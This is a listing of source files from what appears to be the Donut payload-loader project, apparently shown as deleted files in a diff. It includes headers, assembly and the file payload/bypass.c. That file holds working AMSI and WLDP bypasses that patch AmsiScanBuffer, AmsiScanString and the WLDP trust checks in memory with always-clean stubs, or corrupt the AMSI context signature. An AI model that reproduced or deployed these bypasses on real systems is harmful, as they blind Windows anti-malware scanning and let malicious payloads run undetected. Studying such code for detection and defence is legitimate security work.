55 AMSI_RESULT_DETECTED = 32768,
56 } AMSI_RESULT;
57
58 typedef enum tagAMSI_ATTRIBUTE {
59 // Name/version/GUID string of the calling application.
60 AMSI_ATTRIBUTE_APP_NAME = 0,
61 // LPWSTR, filename, URL, script unique id etc.
62 AMSI_ATTRIBUTE_CONTENT_NAME = 1,
63 // ULONGLONG, size of the input. Mandatory.
64 AMSI_ATTRIBUTE_CONTENT_SIZE = 2,
65 // PVOID, memory address if content is fully loaded in memory. Mandatory unless
66 // Read() is implemented instead to support on-demand content retrieval.
67 AMSI_ATTRIBUTE_CONTENT_ADDRESS = 3,
68 // PVOID, session is used to associate different scan calls, e.g. if the contents
69 // to be scanned belong to the sample original script. Return nullptr if content
70 // is self-contained. Mandatory.
71 AMSI_ATTRIBUTE_SESSION = 4,
72 } AMSI_ATTRIBUTE;
73
74 typedef struct IAmsiStreamVtbl {
75 BEGIN_INTERFACE
76
77 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
78 IAmsiStream * This,
79 REFIID riid,
80 void **ppvObject);
81
82 ULONG ( STDMETHODCALLTYPE *AddRef )(
83 IAmsiStream * This);
84
85 ULONG ( STDMETHODCALLTYPE *Release )(
86 IAmsiStream * This);
87
88 HRESULT ( STDMETHODCALLTYPE *GetAttribute )(
89 IAmsiStream * This,
90 AMSI_ATTRIBUTE attribute,
91 ULONG dataSize,
92 unsigned char *data,
93 ULONG *retData);
94
95 HRESULT ( STDMETHODCALLTYPE *Read )(
96 IAmsiStream * This,
97 ULONGLONG position,
98 ULONG size,
99 unsigned char *buffer,
100 ULONG *readSize);
101
102 END_INTERFACE
103 } IAmsiStreamVtbl;
104
105 typedef struct _IAmsiStream {
106 IAmsiStreamVtbl *lpVtbl;
107 } AmsiStream;
108
109 typedef struct IAntimalwareProviderVtbl {
110 BEGIN_INTERFACE
111
112 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
113 IAntimalwareProvider * This,
114 REFIID riid,
115 void **ppvObject);
116
117 ULONG ( STDMETHODCALLTYPE *AddRef )(
118 IAntimalwareProvider * This);
119
120 ULONG ( STDMETHODCALLTYPE *Release )(
121 IAntimalwareProvider * This);
122
123 HRESULT ( STDMETHODCALLTYPE *Scan )(
124 IAntimalwareProvider * This,
125 IAmsiStream *stream,
126 AMSI_RESULT *result);
127
128 void ( STDMETHODCALLTYPE *CloseSession )(
129 IAntimalwareProvider * This,
130 ULONGLONG session);
131
132 HRESULT ( STDMETHODCALLTYPE *DisplayName )(
133 IAntimalwareProvider * This,
134 LPWSTR *displayName);
135
136 END_INTERFACE
137 } IAntimalwareProviderVtbl;
138
139 typedef struct _IAntimalwareProvider {
140 IAntimalwareProviderVtbl *lpVtbl;
141 } AntimalwareProvider;
142
143 typedef struct IAntimalwareVtbl {
144 BEGIN_INTERFACE
145
146 HRESULT ( STDMETHODCALLTYPE *QueryInterface)(
147 IAntimalware *This,
148 REFIID riid,
149 void **ppvObject);
150
151 ULONG ( STDMETHODCALLTYPE *AddRef )(
152 IAntimalware * This);
153
154 ULONG ( STDMETHODCALLTYPE *Release )(
155 IAntimalware * This);
156
157 HRESULT ( STDMETHODCALLTYPE *Scan )(
158 IAntimalware * This,
159 IAmsiStream *stream,
160 AMSI_RESULT *result,
161 IAntimalwareProvider **provider);
162
163 void ( STDMETHODCALLTYPE *CloseSession )(
164 IAntimalware * This,
165 ULONGLONG session);
166
167 END_INTERFACE
168 } IAntimalwareVtbl;
169
170 typedef struct _IAntimalware {
171 IAntimalwareVtbl *lpVtbl;
172 } Antimalware;
173
174 typedef struct tagHAMSICONTEXT {
175 DWORD Signature; // "AMSI" or 0x49534D41
176 PWCHAR AppName; // set by AmsiInitialize
177 IAntimalware *Antimalware; // set by AmsiInitialize
178 DWORD SessionCount; // increased by AmsiOpenSession
179 } _HAMSICONTEXT, *_PHAMSICONTEXT;
180
181 #endif
+0
-373
payload/bypass.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 typedef enum _WLDP_HOST_ID {
32 WLDP_HOST_ID_UNKNOWN = 0,
33 WLDP_HOST_ID_GLOBAL = 1,
34 WLDP_HOST_ID_VBA = 2,
35 WLDP_HOST_ID_WSH = 3,
36 WLDP_HOST_ID_POWERSHELL = 4,
37 WLDP_HOST_ID_IE = 5,
38 WLDP_HOST_ID_MSI = 6,
39 WLDP_HOST_ID_MAX = 7
40 } WLDP_HOST_ID, *PWLDP_HOST_ID;
41
42 typedef struct _WLDP_HOST_INFORMATION {
43 DWORD dwRevision;
44 WLDP_HOST_ID dwHostId;
45 PCWSTR szSource;
46 HANDLE hSource;
47 } WLDP_HOST_INFORMATION, *PWLDP_HOST_INFORMATION;
48
49 #if defined(BYPASS_AMSI_A)
50
51 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
52 HRESULT WINAPI AmsiScanBufferStub(
53 HAMSICONTEXT amsiContext,
54 PVOID buffer,
55 ULONG length,
56 LPCWSTR contentName,
57 HAMSISESSION amsiSession,
58 AMSI_RESULT *result)
59 {
60 *result = AMSI_RESULT_CLEAN;
61 return S_OK;
62 }
63
64 // This function is never called. It's simply used to calculate
65 // the length of AmsiScanBufferStub above.
66 //
67 // The reason it performs a multiplication is because MSVC can identify
68 // functions that perform the same operation and eliminate duplicates
69 // from the compiled code. Null subroutines are eliminated.
70
71 int AmsiScanBufferStubEnd(int a, int b) {
72 return a * b;
73 }
74
75 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
76 HRESULT WINAPI AmsiScanStringStub(
77 HAMSICONTEXT amsiContext,
78 LPCWSTR string,
79 LPCWSTR contentName,
80 HAMSISESSION amsiSession,
81 AMSI_RESULT *result)
82 {
83 *result = AMSI_RESULT_CLEAN;
84 return S_OK;
85 }
86
87 int AmsiScanStringStubEnd(int a, int b) {
88 return a + b;
89 }
90
91 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
92 HMODULE dll;
93 DWORD len, op, t;
94 LPVOID cs;
95
96 // try load amsi. if unable, assume DLL doesn't exist
97 // and return TRUE to indicate it's okay to continue
98 dll = inst->api.LoadLibraryA(inst->amsi.s);
99 if(dll == NULL) return TRUE;
100
101 // resolve address of AmsiScanBuffer. if not found,
102 // return FALSE because it should exist ...
103 cs = inst->api.GetProcAddress(dll, inst->amsiScanBuf);
104 if(cs == NULL) return FALSE;
105
106 // calculate length of stub
107 len = (ULONG_PTR)AmsiScanBufferStubEnd -
108 (ULONG_PTR)AmsiScanBufferStub;
109
110 DPRINT("Length of AmsiScanBufferStub is %" PRIi32 " bytes.", len);
111
112 // check for negative length. this would only happen when
113 // compiler decides to re-order functions.
114 if((int)len < 0) return FALSE;
115
116 // make the memory writeable. return FALSE on error
117 if(!inst->api.VirtualProtect(
118 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
119
120 DPRINT("Overwriting AmsiScanBuffer");
121 // over write with virtual address of stub
122 Memcpy(cs, ADR(PCHAR, AmsiScanBufferStub), len);
123 // set memory back to original protection
124 inst->api.VirtualProtect(cs, len, op, &t);
125
126 // resolve address of AmsiScanString. if not found,
127 // return FALSE because it should exist ...
128 cs = inst->api.GetProcAddress(dll, inst->amsiScanStr);
129 if(cs == NULL) return FALSE;
130
131 // calculate length of stub
132 len = (ULONG_PTR)AmsiScanStringStubEnd -
133 (ULONG_PTR)AmsiScanStringStub;
134
135 DPRINT("Length of AmsiScanStringStub is %" PRIi32 " bytes.", len);
136
137 // check for negative length. this would only happen when
138 // compiler decides to re-order functions.
139 if((int)len < 0) return FALSE;
140
141 // make the memory writeable
142 if(!inst->api.VirtualProtect(
143 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
144
145 DPRINT("Overwriting AmsiScanString");
146 // over write with virtual address of stub
147 Memcpy(cs, ADR(PCHAR, AmsiScanStringStub), len);
148 // set memory back to original protection
149 inst->api.VirtualProtect(cs, len, op, &t);
150
151 return TRUE;
152 }
153
154 #elif defined(BYPASS_AMSI_B)
155
156 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
157 HMODULE dll;
158 PBYTE cs;
159 DWORD i, op, t;
160 BOOL disabled = FALSE;
161 PDWORD Signature;
162
163 // try load amsi. if unable to load, assume
164 // it doesn't exist and return TRUE to indicate
165 // it's okay to continue.
166 dll = inst->api.LoadLibraryA(inst->amsi.s);
167 if(dll == NULL) return TRUE;
168
169 // resolve address of AmsiScanBuffer. if unable, return
170 // FALSE because it should exist.
171 cs = (PBYTE)inst->api.GetProcAddress(dll, inst->amsiScanBuf);
172 if(cs == NULL) return FALSE;
173
174 // scan for signature
175 for(i=0;;i++) {
176 Signature = (PDWORD)&cs[i];
177 // is it "AMSI"?
178 if(*Signature == inst->amsi.w[0]) {
179 // set memory protection for write access
180 inst->api.VirtualProtect(cs, sizeof(DWORD),
181 PAGE_EXECUTE_READWRITE, &op);
182
183 // change signature
184 *Signature++;
185
186 // set memory back to original protection
187 inst->api.VirtualProtect(cs, sizeof(DWORD), op, &t);
188 disabled = TRUE;
189 break;
190 }
191 }
192 return disabled;
193 }
194
195 #elif defined(BYPASS_AMSI_C)
196
197 // Attempt to find AMSI context in .data section of CLR.dll
198 // Could also scan PEB.ProcessHeap for this..
199 // Disabling AMSI via AMSI context is based on idea by Matt Graeber
200 // https://gist.github.com/mattifestation/ef0132ba4ae3cc136914da32a88106b9
201
202 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
203 LPVOID clr;
204 BOOL disabled = FALSE;
205 PIMAGE_DOS_HEADER dos;
206 PIMAGE_NT_HEADERS nt;
207 PIMAGE_SECTION_HEADER sh;
208 DWORD i, j, res;
209 PBYTE ds;
210 MEMORY_BASIC_INFORMATION mbi;
211 _PHAMSICONTEXT ctx;
212
213 // get address of CLR.dll. if unable, this
214 // probably isn't a dotnet assembly being loaded
215 clr = inst->api.GetModuleHandleA(inst->clr);
216 if(clr == NULL) return FALSE;
217
218 dos = (PIMAGE_DOS_HEADER)clr;
219 nt = RVA2VA(PIMAGE_NT_HEADERS, clr, dos->e_lfanew);
220 sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
221 nt->FileHeader.SizeOfOptionalHeader);
222
223 // scan all writeable segments while disabled == FALSE
224 for(i = 0;
225 i < nt->FileHeader.NumberOfSections && !disabled;
226 i++)
227 {
228 // if this section is writeable, assume it's data
229 if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
230 // scan section for pointers to the heap
231 ds = RVA2VA (PBYTE, clr, sh[i].VirtualAddress);
232
233 for(j = 0;
234 j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR);
235 j += sizeof(ULONG_PTR))
236 {
237 // get pointer
238 ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
239 // query if the pointer
240 res = inst->api.VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
241 if(res != sizeof(mbi)) continue;
242
243 // if it's a pointer to heap or stack
244 if ((mbi.State == MEM_COMMIT ) &&
245 (mbi.Type == MEM_PRIVATE ) &&
246 (mbi.Protect == PAGE_READWRITE))
247 {
248 ctx = (_PHAMSICONTEXT)ptr;
249 // check if it contains the signature
250 if(ctx->Signature == inst->amsi.w[0]) {
251 // corrupt it
252 ctx->Signature++;
253 disabled = TRUE;
254 break;
255 }
256 }
257 }
258 }
259 }
260 return disabled;
261 }
262
263 #elif defined(BYPASS_AMSI_D)
264 // This is where you may define your own AMSI bypass.
265 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_C defined.
266
267 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
268
269 }
270
271 #endif
272
273 #if defined(BYPASS_WLDP_A)
274
275 // fake function that always returns S_OK and isApproved = TRUE
276 HRESULT WINAPI WldpIsClassInApprovedListStub(
277 REFCLSID classID,
278 PWLDP_HOST_INFORMATION hostInformation,
279 PBOOL isApproved,
280 DWORD optionalFlags)
281 {
282 *isApproved = TRUE;
283 return S_OK;
284 }
285
286 // make sure prototype is different from other null subroutines
287 // to avoid duplication by MSVC
288 int WldpIsClassInApprovedListStubEnd(int a, int b) {
289 return a - b;
290 }
291
292 // fake function that always returns S_OK
293 HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
294 HANDLE fileHandle,
295 PVOID baseImage,
296 ULONG ImageSize)
297 {
298 return S_OK;
299 }
300
301 int WldpQueryDynamicCodeTrustStubEnd(int a, int b) {
302 return a / b;
303 }
304
305 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
306 HMODULE wldp;
307 DWORD len, op, t;
308 LPVOID cs;
309
310 // try load wldp. if unable, assume DLL doesn't exist
311 // and return TRUE to indicate it's okay to continue
312 wldp = inst->api.LoadLibraryA(inst->wldp);
313 if(wldp == NULL) return TRUE;
314
315 // resolve address of WldpQueryDynamicCodeTrust
316 // if not found, return FALSE because it should exist
317 cs = inst->api.GetProcAddress(wldp, inst->wldpQuery);
318 if(cs == NULL) return FALSE;
319
320 // calculate length of stub
321 len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
322 (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
323
324 DPRINT("Length of WldpQueryDynamicCodeTrustStub is %" PRIi32 " bytes.", len);
325
326 // check for negative length. this would only happen when
327 // compiler decides to re-order functions.
328 if((int)len < 0) return FALSE;
329
330 // make the memory writeable. return FALSE on error
331 if(!inst->api.VirtualProtect(
332 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
333
334 // overwrite with virtual address of stub
335 Memcpy(cs, ADR(PCHAR, WldpQueryDynamicCodeTrustStub), len);
336 // set back to original protection
337 inst->api.VirtualProtect(cs, len, op, &t);
338
339 // resolve address of WldpIsClassInApprovedList
340 // if not found, return FALSE because it should exist
341 cs = inst->api.GetProcAddress(wldp, inst->wldpIsApproved);
342 if(cs == NULL) return FALSE;
343
344 // calculate length of stub
345 len = (ULONG_PTR)WldpIsClassInApprovedListStubEnd -
346 (ULONG_PTR)WldpIsClassInApprovedListStub;
347
348 DPRINT("Length of WldpIsClassInApprovedListStub is %" PRIi32 " bytes.", len);
349
350 // check for negative length. this would only happen when
351 // compiler decides to re-order functions.
352 if((int)len < 0) return FALSE;
353
354 // make the memory writeable. return FALSE on error
355 if(!inst->api.VirtualProtect(
356 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
357
358 // overwrite with virtual address of stub
359 Memcpy(cs, ADR(PCHAR, WldpIsClassInApprovedListStub), len);
360 // set back to original protection
361 inst->api.VirtualProtect(cs, len, op, &t);
362
363 return TRUE;
364 }
365 #elif defined(BYPASS_WLDP_B)
366 // This is where you may define your own WLDP bypass.
367 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_WLDP_B defined.
368
369 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
370
371 }
372 #endif
+0
-121
payload/call_api.asm less more
0 ;
1 ; Copyright © 2019 TheWover, Odzhan. All Rights Reserved.
2 ;
3 ; Redistribution and use in source and binary forms, with or without
4 ; modification, are permitted provided that the following conditions are
5 ; met:
6 ;
7 ; 1. Redistributions of source code must retain the above copyright
8 ; notice, this list of conditions and the following disclaimer.
9 ;
10 ; 2. Redistributions in binary form must reproduce the above copyright
11 ; notice, this list of conditions and the following disclaimer in the
12 ; documentation and/or other materials provided with the distribution.
13 ;
14 ; 3. The name of the author may not be used to endorse or promote products
15 ; derived from this software without specific prior written permission.
16 ;
17 ; THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
18 ; IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
19 ; WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
20 ; DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
21 ; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
22 ; (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 ; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
24 ; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
25 ; STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
26 ; ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
27 ; POSSIBILITY OF SUCH DAMAGE.
28 ;
29 ;
30 ; void call_api(FARPROC api, int param_cnt, WCHAR param[]);
31
32 %define DONUT_MAX_PARAM 8
33 %define DONUT_MAX_NAME 256
34
35 struc HOME_SPACE
36 ._rcx resq 1
37 ._rdx resq 1
38 ._r8 resq 1
39 ._r9 resq 1
40 endstruc
41
42 struc _ds
43 .hs: resq HOME_SPACE_size
44
45 .arg4 resq 1
46 .arg5 resq 1
47 .arg6 resq 1
48 .arg7 resq 1
49
50 ._rdi resq 1
51 ._rsi resq 1
52 ._rbp resq 1
53 ._rbx resq 1
54 ._rsp resq 1
55 endstruc
56
57 %ifndef BIN
58 global call_api
59 global _call_api
60 %endif
61
62 call_api:
63 _call_api:
64 bits 32
65
66 ; int3
67
68 xor eax, eax ;
69 dec eax ;
70 jns L2 ; if SF=0, goto x64
71
72 mov eax, [esp+ 4] ; eax = api address
73 mov ecx, [esp+ 8] ; ecx = param_cnt
74 mov edx, [esp+12] ; edx = params
75 L1:
76 push edx ; save params[i] on stack
77 add edx, DONUT_MAX_NAME * 2 ; advance to next element
78 sub ecx, 1 ; subtract one from param_cnt
79 jnz L1
80 call eax ; call api
81 ret
82
83 L2:
84 bits 64
85
86 sub rsp, ((_ds_size & -16) + 16) - 8
87
88 mov [rsp+_ds._rbp], rbp
89 mov [rsp+_ds._rbx], rbx
90 mov [rsp+_ds._rdi], rdi
91 mov [rsp+_ds._rsi], rsi
92
93 mov rsi, rsp ; rsi = rsp after allocation
94 mov rdi, rcx ; rdi = api to call
95 mov eax, DONUT_MAX_NAME * 2
96
97 mov rcx, r8 ; rcx = param[0]
98 lea rdx, [rcx+rax] ; rdx = param[1]
99 lea r8, [rdx+rax] ; r8 = param[2]
100 lea r9, [r8+rax] ; r9 = param[3]
101
102 lea rbx, [r9+rax]
103 mov [rsp+_ds.arg4], rbx ; param[4]
104 add rbx, rax
105 mov [rsp+_ds.arg5], rbx ; param[5]
106 add rbx, rax
107 mov [rsp+_ds.arg6], rbx ; param[6]
108 add rbx, rax
109 mov [rsp+_ds.arg7], rbx ; param[7]
110 call rdi
111
112 mov rsp, rsi ; restore rsp after allocation
113 mov rsi, [rsp+_ds._rsi]
114 mov rdi, [rsp+_ds._rdi]
115 mov rbx, [rsp+_ds._rbx]
116 mov rbp, [rsp+_ds._rbp]
117
118 add rsp, ((_ds_size & -16) + 16) - 8
119 ret
120
+0
-50
payload/call_api_bin.h less more
0
1 unsigned int CALL_API_BIN[47];
2
3 CALL_API_BIN[0] = 0x7948C031;
4 CALL_API_BIN[1] = 0x24448B1B;
5 CALL_API_BIN[2] = 0x244C8B04;
6 CALL_API_BIN[3] = 0x24548B08;
7 CALL_API_BIN[4] = 0xC281520C;
8 CALL_API_BIN[5] = 0x00000200;
9 CALL_API_BIN[6] = 0x7501E983;
10 CALL_API_BIN[7] = 0xC3D0FFF4;
11 CALL_API_BIN[8] = 0x48EC8148;
12 CALL_API_BIN[9] = 0x48000001;
13 CALL_API_BIN[10] = 0x3024AC89;
14 CALL_API_BIN[11] = 0x48000001;
15 CALL_API_BIN[12] = 0x38249C89;
16 CALL_API_BIN[13] = 0x48000001;
17 CALL_API_BIN[14] = 0x2024BC89;
18 CALL_API_BIN[15] = 0x48000001;
19 CALL_API_BIN[16] = 0x2824B489;
20 CALL_API_BIN[17] = 0x48000001;
21 CALL_API_BIN[18] = 0x8948E689;
22 CALL_API_BIN[19] = 0x0200B8CF;
23 CALL_API_BIN[20] = 0x894C0000;
24 CALL_API_BIN[21] = 0x148D48C1;
25 CALL_API_BIN[22] = 0x048D4C01;
26 CALL_API_BIN[23] = 0x0C8D4D02;
27 CALL_API_BIN[24] = 0x1C8D4900;
28 CALL_API_BIN[25] = 0x9C894801;
29 CALL_API_BIN[26] = 0x00010024;
30 CALL_API_BIN[27] = 0xC3014800;
31 CALL_API_BIN[28] = 0x249C8948;
32 CALL_API_BIN[29] = 0x00000108;
33 CALL_API_BIN[30] = 0x48C30148;
34 CALL_API_BIN[31] = 0x10249C89;
35 CALL_API_BIN[32] = 0x48000001;
36 CALL_API_BIN[33] = 0x8948C301;
37 CALL_API_BIN[34] = 0x0118249C;
38 CALL_API_BIN[35] = 0xD7FF0000;
39 CALL_API_BIN[36] = 0x48F48948;
40 CALL_API_BIN[37] = 0x2824B48B;
41 CALL_API_BIN[38] = 0x48000001;
42 CALL_API_BIN[39] = 0x2024BC8B;
43 CALL_API_BIN[40] = 0x48000001;
44 CALL_API_BIN[41] = 0x38249C8B;
45 CALL_API_BIN[42] = 0x48000001;
46 CALL_API_BIN[43] = 0x3024AC8B;
47 CALL_API_BIN[44] = 0x48000001;
48 CALL_API_BIN[45] = 0x0148C481;
49 CALL_API_BIN[46] = 0x00C30000;
+0
-74
payload/clib.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <inttypes.h>
32 #include <stddef.h>
33
34 // functions to replace intrinsic C library functions
35
36 // funnily enough, MSVC still tries to replace this
37 // with memset hence the use of assembly..
38 void *Memset (void *ptr, int value, size_t num) {
39
40 #ifdef _MSC_VER
41 __stosb(ptr, value, num);
42 #else
43 unsigned char *p = (unsigned char*)ptr;
44
45 while(num--) {
46 *p = value;
47 p++;
48 }
49 #endif
50 return ptr;
51 }
52
53 void *Memcpy (void *destination, const void *source, size_t num) {
54 unsigned char *out = (unsigned char*)destination;
55 unsigned char *in = (unsigned char*)source;
56
57 while(num--) {
58 *out = *in;
59 out++; in++;
60 }
61 return destination;
62 }
63
64 int Memcmp(const void *ptr1, const void *ptr2, size_t num) {
65 register const unsigned char *s1 = (const unsigned char*)ptr1;
66 register const unsigned char *s2 = (const unsigned char*)ptr2;
67
68 while (num-- > 0) {
69 if (*s1++ != *s2++)
70 return s1[-1] < s2[-1] ? -1 : 1;
71 }
72 return 0;
73 }
+0
-916
payload/clr.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef CLR_H
32 #define CLR_H
33
34 typedef struct _ICLRMetaHost ICLRMetaHost;
35 typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo;
36 typedef struct _ICorRuntimeHost ICorRuntimeHost;
37 typedef struct _ICorConfiguration ICorConfiguration;
38 typedef struct _IGCThreadControl IGCThreadControl;
39 typedef struct _IGCHostControl IGCHostControl;
40 typedef struct _IDebuggerThreadControl IDebuggerThreadControl;
41 typedef struct _AppDomain IAppDomain;
42 typedef struct _Assembly IAssembly;
43 typedef struct _Type IType;
44 typedef struct _Binder IBinder;
45 typedef struct _MethodInfo IMethodInfo;
46
47 typedef void *HDOMAINENUM;
48
49 typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )(
50 REFCLSID clsid,
51 REFIID riid,
52 LPVOID *ppInterface);
53
54 typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )(
55 REFCLSID clsid,
56 REFIID riid,
57 LPVOID *ppInterface);
58
59
60 typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void);
61
62 typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void);
63
64 typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )(
65 ICLRRuntimeInfo *pRuntimeInfo,
66 CallbackThreadSetFnPtr pfnCallbackThreadSet,
67 CallbackThreadUnsetFnPtr pfnCallbackThreadUnset);
68
69 #undef DUMMY_METHOD
70 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
71
72 typedef struct _BinderVtbl {
73 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
74 IBinder * This,
75 /* [in] */ REFIID riid,
76 /* [iid_is][out] */ void **ppvObject);
77
78 ULONG ( STDMETHODCALLTYPE *AddRef )(
79 IBinder * This);
80
81 ULONG ( STDMETHODCALLTYPE *Release )(
82 IBinder * This);
83
84 DUMMY_METHOD(GetTypeInfoCount);
85 DUMMY_METHOD(GetTypeInfo);
86 DUMMY_METHOD(GetIDsOfNames);
87 DUMMY_METHOD(Invoke);
88 DUMMY_METHOD(ToString);
89 DUMMY_METHOD(Equals);
90 DUMMY_METHOD(GetHashCode);
91 DUMMY_METHOD(GetType);
92 DUMMY_METHOD(BindToMethod);
93 DUMMY_METHOD(BindToField);
94 DUMMY_METHOD(SelectMethod);
95 DUMMY_METHOD(SelectProperty);
96 DUMMY_METHOD(ChangeType);
97 DUMMY_METHOD(ReorderArgumentArray);
98 } BinderVtbl;
99
100 typedef struct _Binder {
101 BinderVtbl *lpVtbl;
102 } Binder;
103
104 #undef DUMMY_METHOD
